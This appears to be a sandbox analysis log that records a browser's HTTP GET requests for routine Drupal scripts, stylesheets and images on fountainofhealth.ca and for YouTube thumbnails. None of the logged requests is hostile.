Source: global traffic	HTTP traffic detected: GET /vi/FURi5aHgp1g/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCF295eNAE90ECcWgYwCgZpl6X5Wg HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/Aging_featured-2.jpg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/maxresdefault.webp HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/twitter.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/version-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/Message-Blue.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/scroll-parent-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/hidden.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/underscore/underscore-min.js?v=1.13.6 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/safe-active-element-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /vi/FURi5aHgp1g/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCF295eNAE90ECcWgYwCgZpl6X5Wg HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /core/modules/views/css/views.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/disable-selection-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/data-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/plugin-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /modules/ajax_loader/css/wave.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery/jquery.min.js?v=3.7.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/unique-id-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/keycode-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/form-reset-mixin-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/controlgroup-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/focusable-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/ie-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/form-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/drupal.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/draggable-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/checkboxradio-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widget-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/safe-blur-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/dialog-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/mouse-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/misc/ajax.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/message.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/button-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/loadjs/loadjs.min.js?v=4.2.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/Message-Blue.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/tabbable/index.umd.min.js?v=6.1.2 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/misc/progress.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/debounce.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/bootstrap/js/drupal.bootstrap.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/progress.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/js/script.js?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/labels-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/announce.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/misc/states.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
